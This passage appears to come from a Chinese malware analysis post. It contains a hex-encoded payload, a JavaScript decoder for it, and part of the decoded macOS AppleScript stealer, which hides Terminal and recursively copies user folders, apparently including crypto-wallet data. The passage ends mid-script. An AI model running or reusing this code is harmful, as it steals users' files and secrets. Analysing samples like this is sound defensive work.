66725025592b5225592d514c7554506a2b5f6f766e7750673f546f672148522559486f2577725167596d61455437616a6f77516a6e6c516a4f2d516a4d5f50252154527621486f256d475025426c504c756d51256d5f5176425661455437616a6e775125594d50256e2b6f7643453567436d516a436d50254e776f6a4f56506a3f6c6f25596d51764d6d61455437616a4e5635676e5f50256d2b50762b2d5025776c50767763506a4d6a52766e4d50676e6d6f763f5f50253f7261455437616a4245516a5954526a662b5025666d522566475269757750255754526a6d5635674f2b506721475225594761455437616a4d726f6a597251766e4752766f6d50766f456f673f6c52766d5f506a2163506a6f7251763f725225595661455437616a4d546f76426a51674f6a506a4d456f69755f6f674372516a4f2b6f674f476f256d4d354c754d6f6a427261455437616a436c516a6d56516a57546f76427752764d5652764e726f67572d526a3f72526a436d354c756c6f4c756361455437616a6d455067774752763f5652254f5f6f764d2b504c756c51254d4d5167592b52764f636f6a4f6c5276772d61455437616a4f4850763f635176572b51256f71506a21485144752d5025426351674f4d6f674345526a4377516a4d6361455437616a3f456f766e6352762b63506c75546f673f2d517659726f76665f526a2b5f506a42566f67575f51766e4d61455437616a216a5167576d526a4f47527642486f764d6d526a6f6a6f67425635674e456f25595f5025576d52766f4861455437616a6e71526a2172506a6d5f52766e716f254f48516a775452766f5f5276422b52766f6c6f766f6d6f6a3f2b61455437616a6e716f7657636f676f6c6f674d6c526a6d4d50256f566f6a214551252b2d6f674f6351253f4752253f5661455437616a592d5025592d50763f48516a57566f7621475067436d526a4e7150253f5f50766e7750672b56526a666361455437616a596c507659486f6a435f516a59455076216d50447548516a426d35673f6a506759716f254347526a4d4561455437616a3f6c5125436351764f6a51766e485067436c6f674d6d51764f6d5225577251674f6a516a4d455225775661455437616a4e7251674e6c6f6a776d522566726f6a4e476f6a2b6a6f6975546f6742455025422b506c75716f76577261455437616a2b483567436350673f2d51762b72516a6f6a6f25594851254d5f5225772d516a662d5025665f6f6a426361455437616a774d50764e775076424850256f2d5025424750766e54514c757751254e6c51766f2d51764f2d51254e2b61455437616a4e5f6f764f2b52764d716f764d72516a424d3567216a526a6e5f51674e716f6a774851256d56526a666361455437616c752b50256e775025436a52256d2d5167572d506a57726f67666a3567594d6f76576d35676e5f52256d6c61455437616a4e7750764d56506a5972506a2148506a215650673f5651763f6d516a572b35674263526a3f2d526a436d61455437616a597751256f45506a576a507657545025436d51766d545167436d5125777750253f54506a42546f69755461455437616a5963507642546f6a3f775225425f6f76776a51674e2b51254d48516a572b6f7677776f67422d6f676e4761455437616a597250762b6c50447563506a66546f252b485167667150256d726f6975775025772b52764e4751256f4561455437616a2b483567427151764e56516a437150766d565125436d6f674e5f50764f4d52766f633567597751674e6361455437616a6d475176434d51674d6d51676d2b516a6e6d5176596a6f6a422d51254d71516a422d516a662d6f67576d61455437616a6d6a52762b563567592b35674d4751763f6c50672b486f674e2b6f253f546f67436c52767763516a3f5461455437616a424751256e6d5176664d526a4d7150254d5f516a574752766d5f6f674e775025216d516a59726f764e4d61455437616a6f2d6f6a666a5067426a506a3f71507621565167576d5167775f52764e775025576c50766f56506a666c61455437616a6d6a527642455076432d6f6a4d48516a575450254d6c6f254d476f67665f3567667751254d6350256d6a61455437616a3f2b5176592b52762b7250764f486f7666566f6a4d63526a3f5652764f63522566635176435f6f25595461455437616a4e4751767771526a2b7751257777506a4d5450256e5f6f6a6f2d50766f5f50766e456f6a576c52254e2d61455437616a4e4d6f6a43566f6a4e4d6f674d56516a772d5144752b5276576d52766d486f764e48356759545167774861455437616a214d3567576352254345506a3f565244757250256d6a526a57486f76436d6f672b6d3567426c516a216a61455437616a662b506a3f5f526a432d512542455076665f6f6a2b77526a6f4551256f63506a4f486f67215f6f764e6c61455437616a2b546f6a4e54517643715025595452764e773567432b6f6a43726f67215652764f63506a436c5125217261455437616a426c5044752d35674f7135676e6c6f674e4d5067576c6f254e716f67434d516a6f2d50676e6352256f4d61455437616c7554526a6d456f2542545276772b5167575651254d4d51766f7151763f2d5076662d526a4f455169754761455437616a6f6a506a576d50676f565076437750764d6d506a2b5f5125577250255956516a6d6d516777635225774561455437616a4e5452764f546f6a217735676d56526a4f546f256e635025595f5076595f35675747526c75546f676d7161455437616a424d51764f6c526a66476f67424d5276422d526a57456f44752b516975565167572d5076212d6f762b5661455437616a2b6c6f676d5f5176666a51254f715125776352254f715125574d51253f45514475776f25775f6f6a3f5461455437616a4d5651764e456f2543776f6a4d563567424752762b7151766e45506a435f6f6743716f76596c526a594761455437616a4272506a6e2b6f6a6654526a2b4d6f6a66546f763f775067664851672163526a2b48526c754850256d5661455437616a6e456f674d77526a4f5f506a7754506a2b4d516a596c5167576a6f6a77455176666c5067776a6f763f7761455437616a2b2b51676677514c756d526a6f2b35674f2b51254d4551766d5450257771502521775076592b6f252b4d61455437616a2b2b35674d56506a6d71356721566f25777751767756506a424552766e2b506a59456f44756a6f762b6361455437616a6e726f76666d52762b455244756d526a6f7750256e71506a6d7751255963517659726f676671526a4245616c413c2a44666d4f2a752d514c574750256d2150386f7750674373614c3f47614c714531416e6d4f4c4f47356a714764764e4751766d6d35466171612a614764764e4751766d6d35466171612a61474376434561623f4d4f676245312a7045314142476f766d7261623f4d4f676245312a70453141424752765971616243744f67437235766d47504575246f443f4151256e6c35464945312a704531416d726f6743746f253f626445494533646357356a43546f255941614c4f774f67373752764d46507621774f2541375125743752764d46507621774f252133502559542a37565735764341614c664d4f6a436452443f63614c3f47614c4f4651443f6d50256d726f2a706a612a5740514c574750256d2150284945612a523751443f6d5028704261674e6a61676663356a4e2b5144432b612a5237616d49452a3756574f4c576e2a3756572a44666d4f2a756a5125426d24676d734f2a7541504675715144664161676f4750673f6d354575774f67432b614061375076523752764d46507621774f2541374f766d4151674e214f2a7577506c6f7735766d45506743732a3756572a44576d3567434d4f2a756951443f6361676621356c576d506c3f574f67432b61676d7261676f7750674336514466412a3756572a646d776f4570633c676621356c576d506c3f574f67432b61675973614c6641356a6d726f465637514436376f445921522554374f67493761563f6d6f6a5921504c64453c287547354570633c676621356c576d506c3f574f67432b61675973614c6641356a6d726f46563752764e724f675977506c3637616d754650766f77506738453c287541516743722a3756572a645657356a43546f255941614c4f774f67373764416f77506738375125743752764d46507621774f2521675125426d355463572a6456572a646d736f446437356a434d6f4c754d4f6737374f6749373c676d416f254137364575476f45752d514c574750256d215028706a61676621356c576d506c3f574f67432b612a523764416f77506738772a3756572a6456572a256d6a612a376364416f77506738375244363735693f4651256e6c3c2875773546756d3544434d502a75415046704531416e6d4f4c4f47356a714764764e4751766d6d35466177614c3f636f25743c2a6456572a6456572a44666d4f2a75403f6a6d716f287541504670453141664750762b776f4436452a3756572a6456572a2543726f2a75776f3763572a6456572a646d776f4570633c6266675125426d61675973614c6641356a6d726f465637514436376f445921522554374f67493761454e365076664d502a75596b4c3f6d506c667750767437387643414f676d726f693647614556374f674d6d503763572a6456572a6456576f69574d526d75714f254f77506c3663356a434d6f4c754d4f673771614c664d4f6a436452443f63612a523752694346356a43724f626d416f254171614c75714f254f77505642773569647161676f4d504c666d3c6463572a6456572a646d6d504c666d61676d6a612a4d403f6a6d716f28754d354675734f4c5777506a357761676d73616743424f255971614c3f47612a614728256e566f444d6d6f623f2a314661374f674d6d503763572a6456572a6456576f69574d526d75714f254f77506c3663356a434d6f4c754d4f673771614c664d4f6a436452443f63612a523752694346356a43724f626d416f254171614c75714f254f775056427735696471614c3f464f2538772a3756572a6456572a2543713576383c2a6456572a6456572a44666d4f2a7569356a6d416f44754d4f6737374f674937357659766f43754d4f6737375745752d4f4457466f256e4128443f6d5028706a616266675125426d2a3756572a6456572a646d466f2559564f6957774f673863356a434d6f4c754d4f673771614c4f4651443f6d35675941512a563c2a6456572a6456576f256e5661676d6a2a3756572a6456576f256e56614c576d3567434d4f7063572a6456576f256e5661676d6a2a3756572a2543726f2a75466f44756d5244643c2a646d6d506a64374f4c576e2a376d6d506a6437356a43546f2559412a6a43726f2a752d514c574750256d2150647747504575416f25426d6f69574d50284d69356a6d416f252177506a647161674277526c574d356c56772a3756574f4c576e2a3756572a384f4652255767507642566f44616350676d45356a59466b28706a612a57386f25426d6f69574d502875626f4466484f674e5431693f5652443f4d31466171614c4f4651443f6d50256d726f2a706a612a57386f25426d6f69574d5028756252443f4d314661772a3756576f256e56614c3f466b64776d506a64374f6743716f254f465225413c507674376f67437351694f4d5067426d4f4c36634f6957774f67432b51256e56312a75566f4466484f7659713546563c2a44576d3567434d4f2a756951443f6361673f6d35762b6952255437512574376f67437351694f4d504c363c2a646d41356c563c2a6456573f69574d52566f4750673f6d35454d774f67432b61406137507652376f67437351694f4d502a54374f6957774f67432b51256e56612a523751443f6d5028704261674e6a61673f6d35762b69522554772a3756576f256e56614c3f466b6463576f256e56614c576d3567434d4f70776d506a64376f67437351694f4d5067426d4f4c363c507674376f6a6d716f254f46522557456f4461634f6957774f67432b51256e563c6463574f4c576e2a3756573576434161673f6d35693f77506a594151254e723f6a4e716f67434638675941512a75415046756424216657252a756a5125426d612a4d69356a6d416f252177506a6437574570453f6a6d716f384f46522557456f4461476145563c2a646d2b51763f7735454d566f44664151256e4d4f676d4750566f4750673f6d356d754d4f6737772a37565735764341614c756350693f473521754d4f6737374f67493738624e24284337376f6a6d716f2870634f6957774f67432b51256e56612a523761566f775067434c356a5945526a434631416e474f6743733f6a6d716f4436476145563c2a646d2b51763f7735454d5451674e415069666452443f633c6463572a44666d4f2a756d6b4c3f6d506c667750766e7324676d734f2a75415046754b616c3f744f2a6171612a57546f675245312a70456f674e2d6b2a6171612a5769522542716f446445312a70455176436e61455437616a2b6d6b443645312a70456f674e2d616c413c2a646d736f446437526a5972512166776b6a38374f674937367063572a443f6d506754375244755450676d2d52443f775076743761566f77506a3f6d3545613c2a6456574f4c576e2a3756572a646d736f4464373576596a524457773f6a4e716f67434638675941512a75415046706335675941512a7541504675635076216d61676f4750673f6d3545754d354675416f444d413c28706a612a5736512557465244576e3956664750762b776f44363e613763572a6456576f4c435450676d2d52443f6d61676f77506738373c4c664d6f6a594651386f4750673f6d356d754d4f6737375745704564764e4751766d6d35466e4551256e4d356c6d2d50764e4851254373614556374f6749376f6a4e716f67434661673f6d35693f77506a594151254e723f6a4e716f67434638675941512a756951443f63614c576d3567424d52766d726f5463572a6456573576434161676e4d5025383750765237356a43734f254241614c3f47612a577352255242613763572a646d6d506a64374f4c576e2a3756572a443f466b6463572a64565735764341614c664d6f6a594651386f4750673f6d35457541504670633c4c754d4f6737374f67493750676d45356a59466b28756a507642566f4461376f6c5747502875213576434661673f47502559775045754d354675416f444d413c28706a612a574050766e4152256d726f445773396a664750286e4d354c75716f286e2452256f4d356a563e3f67594152247736512557465244576e3956664750762b776f44363e6145563c2a6456572a443f466b6463572a6456572a253f2135674277527659416f28756a5125426d612a574050764e4851254373316a5777506a59466b25664750762b776f44364561674e6a61676f4750673f6d3545757352256f4d356a6d67507642566f4461374f6749376f6a4e716f67434661673f6d35693f77506a594151254e723f6a4e716f67434638675941512a756951443f63614c576d3567424d52766d726f5463572a6456576f256e56614c3f466b6463572a6456573576434161676e474f6743733f6a4e716f67434638675941512a75415046706335675941512a7541504675635076216d61676f4750673f6d3545754d354675416f444d413c28706a612a5736512557465244576e39564f465069435461626647506c3f4d51256e6d356c363e6f6957474f44707252764e2b316a59543567426d316a6e474f6743733945613c2a6456572a44666d4f2a757250693f6d3541592d52764e21506c3f73614c3f4761676f4750673f6d35457063506a4e416f446667507642566f44576452443f63612a52376156592d52764e21506c3f7339564247527659716425662d506943724f4077666f253f77522861772a3756572a646d564f4475715125664d4f673837506a4e416f446675527666474f256e41354675415046755451674e415069666452443f63614c4f774f673737356a43545067592d51256e6c2a3756572a646d564f4475715125664d4f673837506a4e416f446675527666474f256e41354675415046756424216657252a756a5125426d614c756350693f473521754d4f6737375244363752254277524436374f766d41512a75466f44757152256677506a353c2a6456572a6463572a6456573576434161676e474f6743733f6a4e716f674346614c3f4761676f4750673f6d3545757250693f6d35416f4750673f6d356d754d4f67373c2a6456572a44666d4f2a757250693f6d35416f7750674373614c3f47614c7145246a4e416f4366415069576d316c664250676d416f286171612a573950693f6d38693f47356a38723569597151443f6d3144666350286171612a573950693f6d38693f47356a38723569597151443f6d31444f4d502a574e2a3756572a646d466f44756d524464374f766d41512a756a5125426d246a592b6f2875775045757250693f6d35416f77506743732a3756572a64565735764341614c66474f44572d6f386f77506738374f6749376f6a6d716f28756a5125426d246a592b6f2875476f45757250693f6d35416f4750673f6d353763572a6456572a253f2135674277527659416f28757350694346527643675125426d614c3f476159755a38416d5261676f77506738376f6743734f676d7252443f7750766e67507642566f44576452443f63616759736167597151255973614c4f774f673737356a43545067592d51256e6c2a3756572a646d6d506a6437356a43546f2559412a3756572a2543726f2a7541356c563c2a6456574f4c576e2a3756572a646d736f4464376f67437351693f4735626f7750674373614c3f47616743766f44576e61676f7750673837507652376f67437351693f47357063572a6456573576434161673f475269432b6f256e4135416f7750674373614c3f47616743766f44576e61676f7750673837507652376f6a4e716f674346612a576250766621502543724f4c364561674e6a612a4d5452443f63614c3f4761674d47502538376f6a4e716f6743463c6463572a6456573576434161673f474f766e715076595635416f7750674373614c3f47616743766f44576e61676f7750673837507652376f6a4e716f674346612a576250694f7250674e4d6f4c364561674e6a612a4d5452443f63614c3f4761674d47502538376f6a4e716f6743463c6463572a645657356a43546f255941614c4f774f67373752386f7750673837512574373c673f6d35762b41506975675125426d3546706a61673f475269432b6f256e4135416f7750674373612a52376f674e69506a424752253f733f6a6d716f4436772a3756572a6456573576434161676f77506743596b4c3f6d506c6677507674374f674937506a592b6f28756d6b4c3f6d506c6677507674375076523752386f775067383c2a6456572a646d776f45756a5125426d3f444d416f256e7351254e7261676d7361676d72616743744f67437235766d47506c663651446641614c3f636f25743c2a6456572a6456573576434161676f77506743735144776d614c3f47614c66776b6a38375076523752386f775067383c2a6456572a645657512552376f6a6d716f4466776b6a38375a2a7073612a633736247046662a705f61406254362d64374f674d6d503763572a6456572a645657512552373c67574d506a2b245144776d612a71376f6a6d716f4466776b6a387761405437367370373c45704236406141612a633736247046662a7541516743722a3756572a6456572a6456574f4c576e2a3756572a6456572a6456572a253f2135674277527659416f28754d3f6a6d716f2875415046756a507642566f4461376f6743734f676d7252443f7750766e67507642566f44576452443f63614c4f774f673737356a43545067592d51256e6c2a3756572a6456572a6456572a44666d4f2a754552256e4838766d3e6f2875415046754552256e4838766d3e6f28704861676f77506743735144776d2a3756572a6456572a6456576f256e56614c3f466b6463572a6456572a6456576f2542736f6463572a6456572a6456572a25437451446437356a43546f2559412a3756572a6456572a646d6d506a64375125523c2a6456572a6456576f256e5661676d6a2a3756572a6456576f256e5661676d6a2a3756572a646d6d506a6437356a43546f2559412a3756572a2543726f2a7541356c563c2a646d6d506a64374f674371507063576f256e56614c3f466b64776d506a64376f6a6d716f254f46522557456f44613c50767437357643726f594e5652443f4d3c6759414f67432b354c64772a457541356c563c612a75736f446437356a43734f2542414469666d506a64374f6749373c673f47614c66636f254271614c662d356a6d544f2a704552694346502a702b252a756424216638612a2161615954454f44666d352d63373f596657256c432b354035734f624f6966436f6c43415769664149466f41495425436d2b3f282152284377413f416e2a284459215138776e364021356145702b282a753561565721512542562838643e61594d4352246d75352d4d3e252561736659596a4f43564624596d3f38762b5943405674506254543f6a35413821632b36382b4535436d366425364e442a613731383737442a572d5040633736595445612a2161615954455276743e614075356145702b3125214d6b2a21415125216d61403654362a70383144576d4f4c576e61403837592a21466f443f466b2821566f25424d6b287042362a702b3f457535616a6f775067384e642a4e415044704750694341316c77773559544561674d414f4c703e3146497436287442392874423673387266246447516a4e77506c666e35693f6d502861772a4575475045756d356c57473537633761676d6a616759414f67432b354c64375a2a7041362a7541516743722a45703761673f6d5067596e6140363c612a7037357643726f594e5652443f4d3c6759414f67432b354c64373c4670423c646337616743726f2a75776f3763376f256e56614c3f466b64776d506a6437357643726f594e5652443f4d2a6c666d4f2a752135764346506a592b6f2875415046706335696d734f67432b616759414f4c5777526c43416f28704543436659384561772a6c666d4f2a7554356a4e6a5125426d614c3f47612a61474344666d356c36476145706a614c43736f4457725225216d2a6c666d4f2a754652256e56507621394f2521456f4461374f6749376f67493735764d6d506754373576664651447541612a576d52764d47612a64633c59577524563f5a2428706d61405654364070373c467042364070543c2856452a6c666d4f2a7569356a6d416f252177506a64374f67493761454e41504470476145706a614c574d506a3f4750386e215025576d3545706a612a614761377741356c563c2a44666d4f2a75466f446621504c64374f6749373c673f47614c66636f254271614c662d356a6d544f2a704535696d734f67432b4469754650766f77506743466159666438764e6a4f4c4f4d356a436252443f4d434c6d546f28752438624d4d356a3f695244576d3f67594152433f6e3567383738217562514466545067596e35413f4d4f6759386b44756d6145563c2a444f4651443f6d436743744f2a4d466f446621504c6471614c4f4651443f6d50256d726f2a706a612a5777506a6f476145563c6f256e56614c3f466b6477736f44643750676d45356a59466b28754150467554356a4e6a5125426d612a523761454e36512557465244576e31415954356742775276594151254e7261596621354c7547356c6447613777736f4464373567597335694f47356a3f336f256e416f44576d6f2a75415046756c6f443f544f7664634f44666d356a6e4d50253871614c4f4651443f6d50256d726f2a563c6f67437152445637362a7454366477736f44643752764d46507621774f252166524470374f6749376b69714564764d465076216d6145543750676d45356a59466b28706a612a574c50764e6c5067384764764d465076216d3146574e312a754b6156574652446f6d6145543750676d45356a59466b28706a612a572a356a59766f4366476f6c3f695244576d3141574652446f6d3138574650694f736f446147616c4171614c71453f253f6c6f28617161674277526c574d356c56375745704524256d2d356a4e7350766f41616243566f763847616c4171614c7145436a6d76522542565128617161674277526c574d356c563757457045436a6d765225425651284945332854376b46575a356743465228617161674277526c574d356c56375745704552764e2b316a4e546f44574d35764e6a4f4c4f4d356a38722469756d356a6247616c4171614c71452469756d356a594c252a617161674277526c574d356c56375745704552764e2b316a4e546f44574d35764e6a4f4c4f4d356a38722469756d356a594c252a4945332854376b465740514c574750253837646a43415228617161674277526c574d356c5637574570453f764e476f76426d31416663356a4e2b6f28752a6f443f4d3146574e312a754b61566663356a4e2b6f28754052256e4d356c5645312a7571512557465244576e612a523761564f4750764f716f284e40514c574750253837647659725244576e616c4171614c714564764d46507621774f254145312a7571512557465244576e612a523761566663356a4e2b5144432b3146574e312a754b61566663356a4e2b6f2875626f445245312a7571512557465244576e612a523761564f4750764f716f284e40514c5747502538373f6743763146574e312a754b615659465246617161674277526c574d356c5637574570456444572d3146574e312a754b61566647527666475246617161674277526c574d356c56375745704564764e2d52764e2d3146574e336477736f4464374f7659715067434124255954614c3f47614c2b4b616a3f6d35762b69522542716f443f73314143716f256641356c432b61455437354c57476f6a6d716f28706a612a6147316a43716f256641356c432b31694f4d5067426d4f4c3647616c4171614c71456f67437351694f4d5067426d4f4c364764764e77506a4e2b5128617161674277526c574d356c56375745704564764e77506a4e2b51284e69522542716f443f733146574e312a754b616a3f6d35762b69522542716f443f733141437450763f213546617161674277526c574d356c5637574570453f444d476f4c43733146574e312a754b616a3f6d35762b69522542716f443f7331415941507621775246617161674277526c574d356c56375745704552443f4750256d2d3141424752765971615966415069574d6f763847506743766f25425652454945332854376b4657566f4466484f7659715067434135464e445244664d526a5645312a7554356a4e6a5125426d612a5237614549724f765971506743414f7659735225577731766671512543724f2a4e44522542716f443f733146574e312a754b616a3f6d35762b69522542716f443f733141426d6f674f6d356d4e3651446f6d6145543750676d45356a59466b28706a612a57366f253f6c6f44613724676d766f284945332854376b4657566f4466484f7659715067434135464e6650766e6d356a4945312a7554356a4e6a5125426d612a523761454e6650766e6d356a49474f7659715067434135464945332854376b4657566f4466484f7659715067434135464e2a51443f2d50766d7244416647356a3845312a7571512557465244576e612a5237615657774f676647512574474f7659715067434135464945332854376b4657566f4466484f7659715067434135464e3651443f6d52764e77506d4e405069576d6145543750676d45356a59466b28706a612a573651443f6d52764e7750454e69522542716f443f733146574e312a754b616a3f6d35762b69522542716f443f7331413f4d35764d3364764e466f28617161674277526c574d356c5637574570453f67597351626647356a38474f7659715067434135464945332854376b4657566f4466484f7659715067434135464e595067432d4f4c572150434e3643623645312a7554356a4e6a5125426d612a5237614549726f25426d52693f464f25412b504c3f2d31694f4d5067426d4f4c3647616c4171614c71456f67437351694f4d5067426d4f4c36473f25426d52693f4650766e3364765973512a6171614c754650766f77506738375745704531466e6d5067432d4f4c57475045212d5244666331694f4d5067426d4f4c3647616c4171614c71456f67437351694f4d5067426d4f4c36473f69434d356a3f4d6145543750676d45356a59466b28706a612a574c4f2559466f676247616c4171614c71456f67437351694f4d5067426d4f4c36473f674e6c6f25664751256e3364764e466f28617161674277526c574d356c5637574570453f674e6c6f256647512574474f7659715067434135464945332854376b4657566f4466484f7659715067434135464e38356a433e50695733386943774f673845312a7571512557465244576e612a523761567541356a433e50696147356943774f67382b6f67437351693f47352a49453344413c356a434d6f4c4f4651443f6d3c674277526c574d356c563757457045646a6d7252256e2d6f284e4d354c702b35693f47356a3872516c664750456171614c4f4651443f6d50256d726f2a706a612a57566f4466484f7659715067434135464e2a51256e4d506a666d31765954352a21734f674e466f286e5f35764e726145563c356a434d6f4c4f4651443f6d3c674277526c574d356c563757457045644c3f47506a2b6d6f44756d35454e566f4466484f674e5431766647506a6f776f466e5f35764e7261455437616a3f6d35762b69522542716f443f7331213f4750562b6d6f44756d35454e2d50766e6a51253572516c6647504561772a6c576d52253f69356a6d416f284d54356a4e6a5125426d612a523761454e36512557465244576e31412b6d6b25666352256d7235464e7150764f7750456e486f446d2d516759775045215652456171614c4f4651443f6d50256d726f2a706a612a57486f446d2d51675977504561772a6a6d6a614c576d5067434d357638374f674d6d50376357356a434d6f4c4f4651443f6d36454d54356a4e6a5125426d612a523761454e36512557465244576e31414f465069435461626647506c3f4d51256e6d356c36476f6957474f44707252764e2b316a59543567426d316a6e474f67437331416e474f6743244f674e466f286e73352542774f673845312a7569356a6d416f252177506a6437574570453f6a6d716f384f46522557456f446147246a4e416f4366415069576d316c664250676d416f2861772a376d466f2559564f6957774f6738463c4c754650766f77506738375745704531414277526c574d356c56473f6957474f44703764764e724f675977506a434635464e6c356a4e21352a6e2d507641725244755450673872506a4e416f443647246a4e416f4366415069576d316c664250676d416f28216952255445312a7569356a6d416f252177506a6437574570453f6a6d716f384f46522557456f446147246a4e416f4366415069576d316c664250676d416f282169522554453c646357356a434d6f4c4f4651443f6d36454d54356a4e6a5125426d612a523761454e36512557465244576e31414f465069435461626647506c3f4d51256e6d356c36476f6957474f44707252764e2b316a59543567426d316a6e474f67437331416e474f6743244f674e466f286e73352542774f67382b35764d2b614554374f6957774f67432b51256e56612a523761566f775067434c356a5945526a434631416e474f6743244f674e466f286e73352542774f67382b35764d2b6145563c2a44576d52253f69356a6d416f246163354c57476f6a6d716f28706a612a614724676d45356a59466b284e4050766e4152256d726f4457733176664750286e4d354c75716f286e2452256f4d356a56473f67594152284e36512557465244576e3141664750762b776f44364764764e4751766d6d35466e4551256e4d356c6d2d50764e4851254373614554374f6957774f67432b51256e56612a523761566f775067434c356a5945526a43463141664750762b776f443672526a6d725244576e52764e4751766d6d354661772a376d466f2559564f6957774f673863354c57476f6a6d716f28706a612a614724676d45356a59466b284e4050764e48512543733141664750762b776f443672526a6d725244576e52764e4751766d6d35466171614c4f4651443f6d50256d726f2a706a612a57675125426d3f69574d526a576d35454e73522552426145563c6f256e5661676d6a2a6a6d6a61676f775067436c356a5945526a434635467541516743722a376d6a5125426d6f69574d526a576d35454d69356a6d416f252177506a64772a6a43726f2a75776f377769356a6d416f433f6d6b4c64634f44666d356a6e4d50253871614c4f4651443f6d50256d726f2a706a612a572135764346506a592b6f2861772a6c666d4f2a756a6f6d4e5452443f63354675415046754b50676d45356a59466b28706a612a57675144576d6f6a4e743121754650766f77506743733146617161674277526c574d356c563757457045437659416f44576a50693747384c57476f6a6d716f4436476145543750676d45356a59466b28706a612a57645225426d6162214750767447384c57476f6a6d716f443647616c413c356a43546f255941614c4f774f6737376f6a6d466f256f476b2a75775045756a6f6d4e5452443f63355463574f4c576e2a37565735675946357643673f454d6a5144576d6f6a4e74312a7569356a6d416f252177506a64772a376d6d506a64374f4c576e2a6a43726f2a75466f44756d5244643c52764d46507621774f2541634f6957774f67432b51256e56312a752d514c574750256d215038214d352a563c6f67437351694f4d5067426d4f4c36634f6957774f67432b51256e56312a7569522542716f443f66524470772a6c3f6d5067436c356a592b3c4c4f4651443f6d50256d726f2a543750676d45356a59466b28563c6f67493735764d6d506754373576664651447541612a575651443f415046702b5246702b5146702b3144666d3544436d35693f6d356d5773356a36376145706a614c4f4651443f6d50256d726f2a706a612a613731693f2b352a4e474f4464726b6a6d54613777736f256e5644763f4d4f676263362a563c6f67493735764d6d506754373576664651447541612a57465028702b35457045612a52374f6957774f67432b51256e562a6a3f47614c66636f254271614c662d356a6d544f2a7045356a413731693f2b352a4e474f4464726b6a6d546137636c5737";

const encStr2 = "6f676d7350694f723946755451766d71502a75386f44572b51256e4d5070";

function decodeChar(char) {
    return charMap.indexOf(char);
}

// 解码第一步
console.log("Step 1 - Decoding hex strings to ASCII:");
const decodedStr1 = decodeHexString(encStr1);
const decodedStr2 = decodeHexString(encStr2);

console.log("Decoded Hex String 1 (first 50 chars):", decodedStr1.substring(0, 50));
console.log("Decoded Hex String 2:", decodedStr2);

// 第二步解码:6-bit到8-bit的转换
function mapString(str) {
    let result = '';
    let buffer = 0;
    let bits = 0;
    
    for (const char of str) {
        const value = decodeChar(char);
        if (value === -1) continue;
        
        buffer = (buffer << 6) | value;
        bits += 6;
        
        while (bits >= 8) {
            bits -= 8;
            result += String.fromCharCode((buffer >> bits) & 0xFF);
        }
    }
    return result;
}

console.log("\nStep 2 - Final decoded commands:");
const cmd1 = mapString(decodedStr1);
const cmd2 = mapString(decodedStr2);

console.log("\nCommand 1:", cmd1);
console.log("Command 2:", cmd2);

运行上述JS会得到两个病毒脚本

脚本1(千万别运行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
osascript -e 'set release to true
set filegrabbers to true
if release then
	try
		tell window 1 of application "Terminal" to set visible to false
	end try
end if
on filesizer(paths)
	set fsz to 0
	try
		set theItem to quoted form of POSIX path of paths
		set fsz to (do shell script "/usr/bin/mdls -name kMDItemFSSize -raw " & theItem)
	end try
	return fsz
end filesizer
on mkdir(someItem)
	try
		set filePosixPath to quoted form of (POSIX path of someItem)
		do shell script "mkdir -p " & filePosixPath
	end try
end mkdir
on FileName(filePath)
	try
		set reversedPath to (reverse of every character of filePath) as string
		set trimmedPath to text 1 thru ((offset of "/" in reversedPath) - 1) of reversedPath
		set finalPath to (reverse of every character of trimmedPath) as string
		return finalPath
	end try
end FileName
on BeforeFileName(filePath)
	try
		set lastSlash to offset of "/" in (reverse of every character of filePath) as string
		set trimmedPath to text 1 thru -(lastSlash + 1) of filePath
		return trimmedPath
	end try
end BeforeFileName
on writeText(textToWrite, filePath)
	try
		set folderPath to BeforeFileName(filePath)
		mkdir(folderPath)
		set fileRef to (open for access filePath with write permission)
		write textToWrite to fileRef starting at eof
		close access fileRef
	end try
end writeText
on readwrite(path_to_file, path_as_save)
	try
		set fileContent to read path_to_file
		set folderPath to BeforeFileName(path_as_save)
		mkdir(folderPath)
		do shell script "cat " & quoted form of path_to_file & " > " & quoted form of path_as_save
	end try
end readwrite
on readwrite2(path_to_file, path_as_save)
	try
		set folderPath to do shell script "dirname " & quoted form of path_as_save
		mkdir(folderPath)
		tell application "Finder"
  			set sourceFile to POSIX file path_to_file as alias
  			set destinationFolder to POSIX file folderPath as alias
  			duplicate sourceFile to destinationFolder with replacing
		end tell
	end try
end readwrite2
on isDirectory(someItem)
	try
		set filePosixPath to quoted form of (POSIX path of someItem)
		set fileType to (do shell script "file -b " & filePosixPath)
		if fileType ends with "directory" then
			return true
		end if
		return false
	end try
end isDirectory
on GrabFolderLimit(sourceFolder, destinationFolder)
	try
		set bankSize to 0
		set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews"}
		set fileList to list folder sourceFolder without invisibles
		mkdir(destinationFolder)
		repeat with currentItem in fileList
			if currentItem is not in exceptionsList then
				set itemPath to sourceFolder & "/" & currentItem
				set savePath to destinationFolder & "/" & currentItem
				if isDirectory(itemPath) then
					GrabFolderLimit(itemPath, savePath)
				else
					set fsz to filesizer(itemPath)
					set bankSize to bankSize + fsz
					if bankSize < 10 * 1024 * 1024 then
						readwrite(itemPath, savePath)
					end if
				end if
			end if
		end repeat
	end try
end GrabFolderLimit
on GrabFolder(sourceFolder, destinationFolder)
	try
